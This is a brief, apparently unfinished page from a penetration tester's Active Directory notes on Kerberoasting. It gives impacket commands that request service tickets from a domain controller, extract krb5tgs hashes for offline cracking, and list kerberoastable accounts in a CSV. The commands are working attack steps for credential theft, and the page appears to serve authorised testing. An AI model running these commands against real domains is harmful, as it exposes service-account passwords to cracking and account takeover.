🕐Kerberoasting

This page is currently a work in progress

Kerberoast Affected SPNs (NTLM)

impacket-GetUserSPNs -request -save $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER | tee GetUserSPN-Output.txt

Get only tickets for cracking

cat GetUserSPN-Output.txt | grep "krb5tgs" >> kerb.hash

Create affected SPN CSV

cat GetUserSPN-Output.txt | grep 'CN=' | awk -F' ' 'NR==1{print "SPN,Username"};{print $1","$2}' >> Kerberoastable-User-Account.csv

The above may miss SPNs when there is no "MemberOf" field in the SPN (I have seen this on a test before). Also, if you have two identical SPNs where one has the port at the end and the other does not, both will be reported.

PreviousAnalyzing Data with Bloodhound NextConfiguring Windows 11 for AD Testing

Last updated 1 year ago